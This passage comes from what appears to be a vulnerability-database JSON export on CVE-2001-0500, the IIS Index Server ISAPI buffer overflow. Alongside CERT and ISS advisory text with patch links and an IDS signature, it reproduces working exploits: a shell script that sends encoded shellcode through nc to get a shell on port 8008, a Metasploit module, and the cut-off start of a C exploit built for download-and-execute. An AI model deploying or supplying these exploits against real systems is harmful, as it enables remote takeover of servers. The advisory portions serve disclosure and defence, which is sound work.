Corporation\r\n\r\n The following documents regarding this vulnerability are available\r\n from Microsoft:\r\n\r\n http://www.microsoft.com/technet/security/bulletin/MS01-033.asp\r\n\r\nReferences\r\n\r\n 1. VU#952336: Microsoft Index Server/Indexing Service used by IIS\r\n 4.0/5.0 contains unchecked buffer used when encoding double-byte\r\n characters CERT/CC, 06/19/2001,\r\n\r\n https://www.kb.cert.org/vuls/id/952336\r\n\r\n 2. Additional advice on securing IIS web servers is available from\r\n\r\n http://www.microsoft.com/technet/security/iis5chk.asp\r\n http://www.microsoft.com/technet/security/tools.asp\r\n\r\n Feedback concerning this document may be directed to Jeffrey S.\r\n Havrilla.\r\n ______________________________________________________________________\r\n\r\n This document is available from:\r\n\r\n http://www.cert.org/advisories/CA-2001-13.html\r\n\r\n ______________________________________________________________________\r\n\r\nCERT/CC Contact Information\r\n\r\n Email: cert@cert.org\r\n Phone: +1 412-268-7090 &#40;24-hour hotline&#41;\r\n Fax: +1 412-268-6989\r\n Postal address:\r\n CERT Coordination Center\r\n Software Engineering Institute\r\n Carnegie Mellon University\r\n Pittsburgh PA 15213-3890\r\n U.S.A.\r\n\r\n CERT personnel answer the hotline 08:00-17:00 EST&#40;GMT-5&#41; / EDT&#40;GMT-4&#41;\r\n Monday through Friday; they are on call for emergencies during other\r\n hours, on U.S. holidays, and on weekends.\r\n\r\n Using encryption\r\n\r\n We strongly urge you to encrypt sensitive information sent by email.\r\n Our public PGP key is available from\r\n\r\n http://www.cert.org/CERT_PGP.key\r\n\r\n If you prefer to use DES, please call the CERT hotline for more\r\n information.\r\n\r\n Getting security information\r\n\r\n CERT publications and other security information are available from\r\n our web site\r\n\r\n http://www.cert.org/\r\n\r\n To subscribe to the CERT mailing list for advisories and bulletins,\r\n send email to majordomo@cert.org. Please include in the body of your\r\n message\r\n\r\n subscribe cert-advisory\r\n\r\n * &quot;CERT&quot; and &quot;CERT Coordination Center&quot; are registered in the U.S.\r\n Patent and Trademark Office.\r\n ______________________________________________________________________\r\n\r\n NO WARRANTY\r\n Any material furnished by Carnegie Mellon University and the Software\r\n Engineering Institute is furnished on an &quot;as is&quot; basis. Carnegie\r\n Mellon University makes no warranties of any kind, either expressed or\r\n implied as to any matter including, but not limited to, warranty of\r\n fitness for a particular purpose or merchantability, exclusivity or\r\n results obtained from use of the material. Carnegie Mellon University\r\n does not make any warranty of any kind with respect to freedom from\r\n patent, trademark, or copyright infringement.\r\n _________________________________________________________________\r\n\r\n Conditions for use, disclaimers, and sponsorship information\r\n\r\n Copyright 2001 Carnegie Mellon University.\r\n\r\n Revision History\r\nJun 19, 2001: Initial Release\r\n", "edition": 1, "modified": "2001-06-20T00:00:00", "published": "2001-06-20T00:00:00", "id": "SECURITYVULNS:DOC:1738", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:1738", "title": "Advisory CA-2001-13", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:04", "bulletinFamily": "software", "cvelist": ["CVE-2001-0500"], "description": "Internet Security Systems Security Alert\r\nJune 19, 2001\r\n\r\nRemote IIS Index Server ISAPI Extension Buffer Overflow\r\n\r\nSynopsis:\r\n\r\nISS X-Force is aware of a serious vulnerability that can be used to\r\nattack all recent versions of Microsoft Internet Information Server\r\n&#40;IIS&#41;. A flaw exists in ISAPI Index Server extension query processing\r\nthat may lead to Web page defacement and theft of sensitive or \r\nconfidential information. In addition, this vulnerability can be used in\r\nconjunction with other exploits to further compromise affected systems. \r\n\r\nDescription:\r\n\r\nInternet Services Application Programming Interface &#40;ISAPI &#41; extensions \r\nallow for additional functionality to be added to IIS. The ISAPI Index\r\nServer extension provides a hook to integrate Microsoft Index Server \r\nwith IIS. The vulnerability is introduced during the IIS installation\r\nprocess, when two Index Server Dynamic Link Library &#40;DLL &#41; files are\r\ninstalled. Index Server itself does not need to be installed for \r\nattackers to exploit this vulnerability because these DLL files are\r\nmapped by IIS default installations. \r\n\r\nWhen a vulnerable IIS installation receives an Index Server ISAPI query,\r\nIIS parses the query to determine which extension corresponds to the \r\nrequest. Once the query is mapped to the correct extension, the body of\r\nthe request is parsed. The vulnerability is caused by a lack of bounds\r\nchecking on the length of the Index Server ISAPI request. Two potential\r\nattack scenarios exist. A Denial of Service &#40;DoS&#41; attack can be \r\nlaunched against IIS by sending a very long string to the Index Server\r\nISAPI extension. Additionally, an attacker may use an advanced exploit\r\nto send a specially-crafted long request to execute arbitrary code on\r\nthe vulnerable system. The Index Server ISAPI extension runs under the\r\n&quot;System&quot; security context. Any successful attack will run under this \r\ncontext and may lead to unrestricted access of the target machine and \r\nits contents.\r\n\r\n\r\nAffected Versions:\r\n\r\nMicrosoft Windows NT version 4.0\r\n Running IIS 4.0\r\nMicrosoft Windows 2000 Professional, Server, Advanced Server and \r\nDatacenter Server\r\n Running IIS 5.0\r\n\r\nRecommendations:\r\n\r\nDetailed exploit information has been released, and ISS X-Force urges\r\nall administrators to download and apply the following patches made\r\navailable by Microsoft. \r\n\r\nFor Microsoft Windows NT version 4.0:\r\nhttp://www.microsoft.com/Downloads/Release.asp?ReleaseID=30833\r\n\r\nFor Microsoft Windows 2000 Professional, Server and Advanced Server:\r\nhttp://www.microsoft.com/Downloads/Release.asp?ReleaseID=30800\r\n\r\nFor Microsoft Windows 2000 Datacenter Server:\r\nPatches for Windows 2000 Datacenter Server are hardware-specific and \r\navailable from the original equipment manufacturer.\r\n\r\nFor more information on this vulnerability please refer to the Microsoft\r\nSecurity Bulletin at:\r\nhttp://www.microsoft.com/technet/security/bulletin/MS01-033.asp\r\n\r\n\r\nISS RealSecure intrusion detection customers may use the following \r\nuser-defined signature to detect access attempts to .ida files. Follow\r\nthe instructions below to apply the user-defined signature to your \r\npolicy. \r\n\r\n- From the Sensor window:\r\n1. Right-click on the sensor and select &#39;Properties&#39;.\r\n2. Choose a policy you want to use, and click &#39;Customize&#39;.\r\n3. Select the &#39;User Defined Events&#39; tab.\r\n4. Click &#39;Add&#39; on the right hand side of the dialog box.\r\n5. Create a User Defined Event.\r\n6. Type in a name of the event, such as &#39;IDA file access attempt&#39;.\r\n7. In the &#39;Context&#39; field for each event, select &#39;URL_Data&#39;. \r\n In the &#39;String&#39; field, type the following string:\r\n &#92;.ida$ \r\n8. Click &#39;Save&#39;, and then &#39;Close&#39;.\r\n9. Click &#39;Apply to Sensor&#39; or &#39;Apply to Engine&#39;, depending on the\r\n version of RealSecure you are using.\r\n\r\nISS Internet Scanner X-Press Update version 4.10 provides assessment\r\ncapability for this vulnerability. \r\n\r\nInternet Scanner X-Press Update version 4.10 will be available later\r\nthis week for download at the following URL:\r\nhttp://www.iss.net/db_data/xpu/IS.php\r\n\r\nThe next X-Press Update for ISS RealSecure Network Sensor will contain a\r\nsignature to detect this vulnerability.\r\n\r\nNetworkICE provides an update for BlackICE products to detect this \r\nvulnerability. ISS X-Force recommends that all BlackICE customers refer\r\nto the following URL for information regarding the detection of this \r\nvulnerability: \r\nhttp://www.networkice.com/downloads/agent_detection_update25eq.html\r\n\r\n\r\nAdditional Information:\r\n\r\nThe Common Vulnerabilities and Exposures &#40;CVE&#41; project has assigned the\r\nname CAN-2001-0500 to this issue. This is a candidate for inclusion in\r\nthe CVE list &#40;http://cve.mitre.org&#41;, which standardizes names for \r\nsecurity problems.\r\n\r\nFor additional information about this vulnerability, please reference:\r\nhttp://www.eeye.com/html/Research/Advisories/AD20010618.html\r\n\r\n______\r\n\r\nAbout Internet Security Systems &#40;ISS&#41; \r\n\r\nInternet Security Systems is the leading global provider of security \r\nmanagement solutions for the Internet, protecting digital assets and \r\nensuring safe and uninterrupted e-business. With its industry-leading \r\nintrusion detection and vulnerability assessment, remote managed \r\nsecurity services, and strategic consulting and education offerings, ISS\r\nis a trusted security provider to more than 8,000 customers worldwide\r\nincluding 21 of the 25 largest U.S. commercial banks and the top 10 U.S. \r\ntelecommunications companies. Founded in 1994, ISS is headquartered in \r\nAtlanta, GA, with additional offices throughout North America and \r\ninternational operations in Asia, Australia, Europe, Latin America and\r\nthe Middle East. For more information, visit the Internet Security \r\nSystems web site at www.iss.net or call 888-901-7477.\r\n\r\n\r\nCopyright &#40;c&#41; 2001 Internet Security Systems, Inc.\r\n\r\nPermission is hereby granted for the redistribution of this Alert\r\nelectronically. It is not to be edited in any way without express\r\nconsent of the X-Force. If you wish to reprint the whole or any part of\r\nthis Alert in any other medium excluding electronic medium, please\r\ne-mail xforce@iss.net for permission.\r\n\r\nDisclaimer\r\n\r\nThe information within this paper may change without notice. Use of this\r\ninformation constitutes acceptance for use in an AS IS condition. There\r\nare NO warranties with regard to this information. In no event shall the\r\nauthor be liable for any damages whatsoever arising out of or in \r\nconnection with the use or spread of this information. Any use of this\r\ninformation is at the user&#39;s own risk.\r\n\r\n\r\nX-Force PGP Key available at: http://xforce.iss.net/sensitive.php\r\nas well as on MIT&#39;s PGP key server and PGP.com&#39;s key server.\r\n\r\nPlease send suggestions, updates, and comments to: X-Force\r\nxforce@iss.net of Internet Security Systems, Inc.\r\n", "edition": 1, "modified": "2001-06-20T00:00:00", "published": "2001-06-20T00:00:00", "id": "SECURITYVULNS:DOC:1737", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:1737", "title": "ISSalert: ISS Alert: Remote IIS Index Server ISAPI Extension Buffer Overflow", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2016-02-02T15:18:40", "description": "MS Index Server 2.0 and Indexing Service for Win 2000 ISAPI Extension Buffer Overflow (3). CVE-2001-0500. Remote exploit for windows platform", "published": "2001-06-18T00:00:00", "type": "exploitdb", "title": "Microsoft Index Server 2.0 and Indexing Service for Win 2000 ISAPI Extension Buffer Overflow 3", "bulletinFamily": "exploit", "cvelist": ["CVE-2001-0500"], "modified": "2001-06-18T00:00:00", "id": "EDB-ID:20932", "href": "https://www.exploit-db.com/exploits/20932/", "sourceData": "source: http://www.securityfocus.com/bid/2880/info\r\n \r\nWindows Index Server ships with Windows NT 4.0 Option Pack; Windows Indexing Service ships with Windows 2000. An unchecked buffer resides in the 'idq.dll' ISAPI extension associated with each service. A maliciously crafted request could allow arbitrary code to run on the host in the Local System context.\r\n \r\nNote that Index Server and Indexing Service do not need to be running for an attacker to exploit this issue. Since 'idq.dll' is installed by default when IIS is installed, IIS would need to be the only service running.\r\n \r\nNote also that this vulnerability is currently being exploited by the 'Code Red' worm. In addition, all products that run affected versions of IIS are also vulnerable.\r\n\r\n#!/bin/sh\r\n# .ida nasty exploit\r\n# mat@hacksware.com,mat@monkey.org\r\n# http://monkey.org/~mat\r\n#\r\n# If this exploit succeeds, you can get into the machine through port 8008\r\n# shellcode generated by DeepZone generator\r\n# I only tested this code under W2k Korean Version, so the offset value may vary through systems, you can get the offset\r\nvalue with WinDbg tool included in Windows SDK\r\n#\r\n# How to get the offset:\r\n# 1. start windbg and attach to inetinfo.exe process. and go(F5)\r\n# 2. using this script attack the test machine\r\n# 3. if the offset in this script is not valid, then inetinfo.exe will be got break.\r\n# 4. you can search the shellcode position with following command\r\n# s 10000 Lfffff 0x68 0x5e 0x56 0xc3 0x90\r\n# 5. if the shellcode position is 0xaabbccdd\r\n# then you can change the %u...%u...to %uccdd%uaabb\r\n\r\ntarget=$1\r\nSHELLCODE=`printf\r\n\"\\x68\\x5e\\x56\\xc3\\x90\\x54\\x59\\xff\\xd1\\x58\\x33\\xc9\\xb1\\x1c\\x90\\x90\\x90\\x90\\x03\\xf1\\x56\\x5f\\x33\\xc9\\x66\\xb9\\x95\\x04\\x90\\x90\\x9\r\n0\\xac\\x34\\x99\\xaa\\xe2\\xfa\\x71\\x99\\x99\\x99\\x99\\xc4\\x18\\x74\\x40\\xb8\\xd9\\x99\\x14\\x2c\\x6b\\xbd\\xd9\\x99\\x14\\x24\\x63\\xbd\\xd9\\x99\\xf\r\n3\\x9e\\x09\\x09\\x09\\x09\\xc0\\x71\\x4b\\x9b\\x99\\x99\\x14\\x2c\\xb3\\xbc\\xd9\\x99\\x14\\x24\\xaa\\xbc\\xd9\\x99\\xf3\\x93\\x09\\x09\\x09\\x09\\xc0\\x7\r\n1\\x23\\x9b\\x99\\x99\\xf3\\x99\\x14\\x2c\\x40\\xbc\\xd9\\x99\\xcf\\x14\\x2c\\x7c\\xbc\\xd9\\x99\\xcf\\x14\\x2c\\x70\\xbc\\xd9\\x99\\xcf\\x66\\x0c\\xaa\\xb\r\nc\\xd9\\x99\\xf3\\x99\\x14\\x2c\\x40\\xbc\\xd9\\x99\\xcf\\x14\\x2c\\x74\\xbc\\xd9\\x99\\xcf\\x14\\x2c\\x68\\xbc\\xd9\\x99\\xcf\\x66\\x0c\\xaa\\xbc\\xd9\\x9\r\n9\\x5e\\x1c\\x6c\\xbc\\xd9\\x99\\xdd\\x99\\x99\\x99\\x14\\x2c\\x6c\\xbc\\xd9\\x99\\xcf\\x66\\x0c\\xae\\xbc\\xd9\\x99\\x14\\x2c\\xb4\\xbf\\xd9\\x99\\x34\\xc\r\n9\\x66\\x0c\\xca\\xbc\\xd9\\x99\\x14\\x2c\\xa8\\xbf\\xd9\\x99\\x34\\xc9\\x66\\x0c\\xca\\xbc\\xd9\\x99\\x14\\x2c\\x68\\xbc\\xd9\\x99\\x14\\x24\\xb4\\xbf\\xd\r\n9\\x99\\x3c\\x14\\x2c\\x7c\\xbc\\xd9\\x99\\x34\\x14\\x24\\xa8\\xbf\\xd9\\x99\\x32\\x14\\x24\\xac\\xbf\\xd9\\x99\\x32\\x5e\\x1c\\xbc!\r\n\\xbf\\xd9\\x99\\x99\\x99\\x99\\x99\\x5e\\x1c\\xb8\\xbf\\xd9\\x99\\x98\\x98\\x99\\x99\\x14\\x2c\\xa0\\xbf\\xd9\\x99\\xcf\\x14\\x2c\\x6c\\xbc\\xd9\\x99\\xcf\r\n\\xf3\\x99\\xf3\\x99\\xf3\\x89\\xf3\\x98\\xf3\\x99\\xf3\\x99\\x14\\x2c\\xd0\\xbf\\xd9\\x99\\xcf\\xf3\\x99\\x66\\x0c\\xa2\\xbc\\xd9\\x99\\xf1\\x99\\xb9\\x99\r\n\\x99\\x09\\xf1\\x99\\x9b\\x99\\x99\\x66\\x0c\\xda\\xbc\\xd9\\x99\\x10\\x1c\\xc8\\xbf\\xd9\\x99\\xaa\\x59\\xc9\\xd9\\xc9\\xd9\\xc9\\x66\\x0c\\x63\\xbd\\xd9\r\n\\x99\\xc9\\xc2\\xf3\\x89\\x14\\x2c\\x50\\xbc\\xd9\\x99\\xcf\\xca\\x66\\x0c\\x67\\xbd\\xd9\\x99\\xf3\\x9a\\xca\\x66\\x0c\\x9b\\xbc\\xd9\\x99\\x14\\x2c\\xcc\r\n\\xbf\\xd9\\x99\\xcf\\x14\\x2c\\x50\\xbc\\xd9\\x99\\xcf\\xca\\x66\\x0c\\x9f\\xbc\\xd9\\x99\\x14\\x24\\xc0\\xbf\\xd9\\x99\\x32\\xaa\\x59\\xc9\\x14\\x24\\xfc\r\n\\xbf\\xd9\\x99\\xce\\xc9\\xc9\\xc9\\x14\\x2c\\x70\\xbc\\xd9\\x99\\x34\\xc9\\x66\\x0c\\xa6\\xbc\\xd9\\x99\\xf3\\xa9\\x66\\x0c\\xd6\\xbc\\xd9\\x99\\x72\\xd4\r\n\\x09\\x09\\x09\\xaa\\x59\\xc9\\x14\\x24\\xfc\\xbf\\xd9\\x99\\xce\\xc9\\xc9\\xc9\\x14\\x2c\\x70\\xbc\\xd9\\x99\\x34\\xc9\\x66\\x0c\\xa6\\xbc\\xd9\\x99\\xf3\r\n\\xa9\\x66\\x0c\\xd6\\xbc\\xd9\\x99\\x1a\\x24\\xfc\\xbf\\xd9\\x99\\x9b\\x96\\x1b\\x8e\\x98\\x99\\x99\\x18\\x24\\xfc\\xbf\\xd9\\x99\\x98\\xb9\\x99\\x99\\xe!\r\nb\\x97\\x09\\x09\\x09\\x09\\x5e\\x1c\\xfc\\xbf\\xd9\\x99\\x99\\xb9\\x99\\x99\\xf3\\x99\\x12\\x1c\\xfc\\xbf\\xd9\\x99\\x14\\x24\\xfc\\xbf\\xd9\\x99\\xce\\xc\r\n9\\x12\\x1c\\xc8\\xbf\\xd9\\x99\\xc9\\x14\\x2c\\x70\\xbc\\xd9\\x99\\x34\\xc9\\x66\\x0c\\xde\\xbc\\xd9\\x99\\xf3\\xa9\\x66\\x0c\\xd6\\xbc\\xd9\\x99\\x12\\x1\r\nc\\xfc\\xbf\\xd9\\x99\\xf3\\x99\\xc9\\x14\\x2c\\xc8\\xbf\\xd9\\x99\\x34\\xc9\\x14\\x2c\\xc0\\xbf\\xd9\\x99\\x34\\xc9\\x66\\x0c\\x93\\xbc\\xd9\\x99\\xf3\\x9\r\n9\\x14\\x24\\xfc\\xbf\\xd9\\x99\\xce\\xf3\\x99\\xf3\\x99\\xf3\\x99\\x14\\x2c\\x70\\xbc\\xd9\\x99\\x34\\xc9\\x66\\x0c\\xa6\\xbc\\xd9\\x99\\xf3\\xa9\\x66\\x0\r\nc\\xd6\\xbc\\xd9\\x99\\xaa\\x50\\xa0\\x14\\xfc\\xbf\\xd9\\x99\\x96\\x1e\\xfe\\x66\\x66\\x66\\xf3\\x99\\xf1\\x99\\xb9\\x99\\x99\\x09\\x14\\x2c\\xc8\\xbf\\xd\r\n9\\x99\\x34\\xc9\\x14\\x2c\\xc0\\xbf\\xd9\\x99\\x34\\xc9\\x66\\x0c\\x97\\xbc\\xd9\\x99\\x10\\x1c\\xf8\\xbf\\xd9\\x99\\xf3\\x99\\x14\\x24\\xfc\\xbf\\xd9\\x9\r\n9\\xce\\xc9\\x14\\x2c\\xc8\\xbf\\xd9\\x99\\x34\\xc9\\x14\\x2c\\x74\\xbc\\xd9\\x99\\x34\\xc9\\x66\\x0c\\xd2\\xbc\\xd9\\x99\\xf3\\xa9\\x66\\x0c\\xd6\\xbc\\xd\r\n9\\x99\\xf3\\x99\\x12\\x1c\\xf8\\xbf\\xd9\\x99\\x14\\x24\\xfc\\xbf\\xd9\\x99\\xce\\xc9\\x12\\x1c\\xc8\\xbf\\xd9\\x99\\xc9\\x14\\x2c\\x70\\xbc\\xd9\\x99\\x!\r\n34\\xc9\\x66\\x0c\\xde\\xbc\\xd9\\x99\\xf3\\xa9\\x66\\x0c\\xd6\\xbc\\xd9\\x99\\x70\\x20\\x67\\x66\\x66\\x14\\x2c\\xc0\\xbf\\xd9\\x99\\x34\\xc9\\x66\\x0c\\x\r\n8b\\xbc\\xd9\\x99\\x14\\x2c\\xc4\\xbf\\xd9\\x99\\x34\\xc9\\x66\\x0c\\x8b\\xbc\\xd9\\x99\\xf3\\x99\\x66\\x0c\\xce\\xbc\\xd9\\x99\\xc8\\xcf\\xf1\\xe5\\x89\\x\r\n99\\x98\\x09\\xc3\\x66\\x8b\\xc9\\xc2\\xc0\\xce\\xc7\\xc8\\xcf\\xca\\xf1\\xad\\x89\\x99\\x98\\x09\\xc3\\x66\\x8b\\xc9\\x35\\x1d\\x59\\xec\\x62\\xc1\\x32\\x\r\nc0\\x7b\\x70\\x5a\\xce\\xca\\xd6\\xda\\xd2\\xaa\\xab\\x99\\xea\\xf6\\xfa\\xf2\\xfc\\xed\\x99\\xfb\\xf0\\xf7\\xfd\\x99\\xf5\\xf0\\xea\\xed\\xfc\\xf7\\x99\\x\r\nf8\\xfa\\xfa\\xfc\\xe9\\xed\\x99\\xea\\xfc\\xf7\\xfd\\x99\\xeb\\xfc\\xfa\\xef\\x99\\xfa\\xf5\\xf6\\xea\\xfc\\xea\\xf6\\xfa\\xf2\\xfc\\xed\\x99\\xd2\\xdc\\x\r\ncb\\xd7\\xdc\\xd5\\xaa\\xab\\x99\\xda\\xeb\\xfc\\xf8\\xed\\xfc\\xc9\\xf0\\xe9\\xfc\\x99\\xde\\xfc\\xed\\xca\\xed\\xf8\\xeb\\xed\\xec\\xe9\\xd0\\xf7\\xff\\x\r\nf6\\xd8\\x99\\xda\\xeb\\xfc\\xf8\\xed\\xfc\\xc9\\xeb\\xf6\\xfa\\xfc\\xea\\xea\\xd8\\x99\\xc9\\xfc\\xfc\\xf2\\xd7\\xf8\\xf4\\xfc\\xfd\\xc9\\xf0\\xe9\\xfc\\x\r\n99\\xde\\xf5\\xf6\\xfb\\xf8\\xf5\\xd8\\xf5\\xf5\\xf6\\xfa\\x99\\xcb\\xfc\\xf8\\xfd\\xdf\\xf0\\xf5\\xfc\\x99\\xce\\xeb\\xf0\\xed\\xfc\\xdf\\xf0\\xf5\\xfc\\!\r\nx99\\xca\\xf5\\xfc\\xfc\\xe9\\x99\\xda\\xf5\\xf6\\xea\\xfc\\xd1\\xf8\\xf7\\xfd\\xf5\\xfc\\x99\\xdc\\xe1\\xf0\\xed\\xc9\\xeb\\xf6\\xfa\\xfc\\xea\\xea\\x99\\\r\nxda\\xf6\\xfd\\xfc\\xfd\\xb9\\xfb\\xe0\\xb9\\xe5\\xc3\\xf8\\xf7\\xb9\\xa5\\xf0\\xe3\\xf8\\xf7\\xd9\\xfd\\xfc\\xfc\\xe9\\xe3\\xf6\\xf7\\xfc\\xb7\\xf6\\xeb\\\r\nxfe\\xa7\\x9b\\x99\\x86\\xd1\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x95\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x98\\x99\\x99\\x99\\x99\\\r\nx99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\\r\nx99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\\r\nx99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\\r\nx99\\x99\\x99\\x99\\x99\\x99\\xda\\xd4\\xdd\\xb7\\xdc\\xc1\\xdc\\x99\\x99\\x99\\x99\\x99\\x89\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\x99\\\r\nx99\\x99\\x99\\x99\\x99\\x99\\x99\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"`\r\n#for w2k no sp:\r\n#GET_LINE=\"GET /test.ida?`perl -e 'print \"N\"x230'`%u0101%u00b5%u0101%u00b5%u0101%u00b5%u0101%u00b5=x HTTP/1.0\"\r\n#for w2k sp2:\r\nGET_LINE=\"GET /test.ida?`perl -e 'print \"N\"x230'`%u0abf%u00b6%u0abf%u00b6%u0abf%u00b6%u0abf%u00b6=x HTTP/1.0\"\r\nnc $target 80 <<EOF\r\n`echo $GET_LINE`\r\nyahoo: `perl -e 'print \"\\x90\"x11800'`$SHELLCODE\r\n\r\nEOF", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/20932/"}, {"lastseen": "2016-02-01T23:56:44", "description": "Microsoft IIS 5.0 IDQ Path Overflow. CVE-2001-0500. Remote exploit for windows platform", "published": "2010-06-15T00:00:00", "type": "exploitdb", "title": "Microsoft IIS 5.0 IDQ Path Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2001-0500"], "modified": "2010-06-15T00:00:00", "id": "EDB-ID:16472", "href": "https://www.exploit-db.com/exploits/16472/", "sourceData": "##\r\n# $Id: ms01_033_idq.rb 9525 2010-06-15 07:18:08Z jduck $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = GoodRanking\r\n\r\n\tinclude Msf::Exploit::Remote::Tcp\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'Microsoft IIS 5.0 IDQ Path Overflow',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a stack buffer overflow in the IDQ ISAPI handler for\r\n\t\t\t\tMicrosoft Index Server.\r\n\t\t\t},\r\n\t\t\t'Author' => [ 'MC' ],\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Version' => '$Revision: 9525 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2001-0500'],\r\n\t\t\t\t\t[ 'OSVDB', '568'],\r\n\t\t\t\t\t[ 'MSB', 'MS01-033'],\r\n\t\t\t\t\t[ 'BID', '2880'],\r\n\t\t\t\t],\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'EXITFUNC' => 'thread',\r\n\t\t\t\t},\r\n\r\n\t\t\t'Privileged' => false,\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 800,\r\n\t\t\t\t\t'BadChars' => \"\\x00\\x3a\\x26\\x3f\\x25\\x23\\x20\\x0a\\x0d\\x2f\\x2b\\x0b\\x5c\",\r\n\t\t\t\t\t'StackAdjustment' => -3500,\r\n\t\t\t\t},\r\n\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'Windows 2000 Pro English SP0', { 'Ret' => '0x6e8f3e24' } ],\r\n\t\t\t\t\t[ 'Windows 2000 Pro English SP1-SP2', { 'Ret' => '0x6e8f8cc4' } ],\r\n\t\t\t\t],\r\n\t\t\t'DisclosureDate' => 'Jun 18 2001',\r\n\t\t\t'DefaultTarget' => 0))\r\n\r\n\t\tregister_options([Opt::RPORT(80)], self.class)\r\n\tend\r\n\r\n\tdef exploit\r\n\t\tconnect\r\n\r\n\t\tsploit = rand_text_alphanumeric(1) + \".idq?\" + rand_text_alphanumeric(232)\r\n\t\tsploit << \"%u06eb.%u\" + target.ret[-4, 4] + \"%u\" + target.ret[-8, 4]\r\n\t\tsploit << \".%uC033%uB866%u031F%u0340%u8BD8%u8B03%u6840%uDB33%u30B3%uC303%uE0FF=\"\r\n\t\tsploit << rand_text_alphanumeric(1) + \" HTTP/1.0\\r\\n\\r\\n\" + rand_text_alphanumeric(46)\r\n\r\n\t\turi = '/' + sploit + payload.encoded\r\n\r\n\t\tres = \"GET #{uri}\\r\\n\\r\\n\"\r\n\r\n\t\tprint_status(\"Trying target #{target.name}...\")\r\n\r\n\t\tsock.put(res)\r\n\r\n\t\thandler\r\n\t\tdisconnect\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/16472/"}, {"lastseen": "2016-02-02T15:18:32", "description": "MS Index Server 2.0 and Indexing Service for Win 2000 ISAPI Extension Buffer Overflow (2). CVE-2001-0500. Remote exploit for windows platform", "published": "2001-06-21T00:00:00", "type": "exploitdb", "title": "Microsoft Index Server 2.0 and Indexing Service for Win 2000 ISAPI Extension Buffer Overflow 2", "bulletinFamily": "exploit", "cvelist": ["CVE-2001-0500"], "modified": "2001-06-21T00:00:00", "id": "EDB-ID:20931", "href": "https://www.exploit-db.com/exploits/20931/", "sourceData": "source: http://www.securityfocus.com/bid/2880/info\r\n \r\nWindows Index Server ships with Windows NT 4.0 Option Pack; Windows Indexing Service ships with Windows 2000. An unchecked buffer resides in the 'idq.dll' ISAPI extension associated with each service. A maliciously crafted request could allow arbitrary code to run on the host in the Local System context.\r\n \r\nNote that Index Server and Indexing Service do not need to be running for an attacker to exploit this issue. Since 'idq.dll' is installed by default when IIS is installed, IIS would need to be the only service running.\r\n \r\nNote also that this vulnerability is currently being exploited by the 'Code Red' worm. In addition, all products that run affected versions of IIS are also vulnerable.\r\n\r\n/*\r\n IIS5.0 .idq overrun remote exploit\r\n Programmed by hsj : 01.06.21\r\n\r\n code flow:\r\n overrun -> jmp or call ebx -> jmp 8 ->\r\n check shellcode addr and jump to there ->\r\n shellcode -> make back channel -> download & exec code\r\n*/\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <signal.h>\r\n#include <sys/types.h>\r\n#include <sys/socket.h>\r\n#include <sys/ioctl.h>\r\n#include <sys/time.h>\r\n#include <sys/wait.h>\r\n#include <errno.h>\r\n#include <unistd.h>\r\n#include <fcntl.h>\r\n#include <netinet/in.h>\r\n#include <limits.h>\r\n#include <netdb.h>\r\n#include <arpa/inet.h>\r\n\r\n#define RET 0x77e516de /* jmp or call ebx */\r\n#define GMHANDLEA 0x77e56c42 /* Address of GetModuleHandleA */\r\n#define GPADDRESS 0x77e59ac1 /* Address of GetProcAddress */\r\n#define GMHANDLEA_OFFSET 24\r\n#define GPADDRESS_OFFSET 61\r\n#define OFFSET 234 /* exception handler offset */\r\n#define NOP 0x41\r\n\r\n#define MASKING 1\r\n#if MASKING\r\n#define PORTMASK 0x4141\r\n#define ADDRMASK 0x41414141\r\n#define PORTMASK_OFFSET 128\r\n#define ADDRMASK_OFFSET 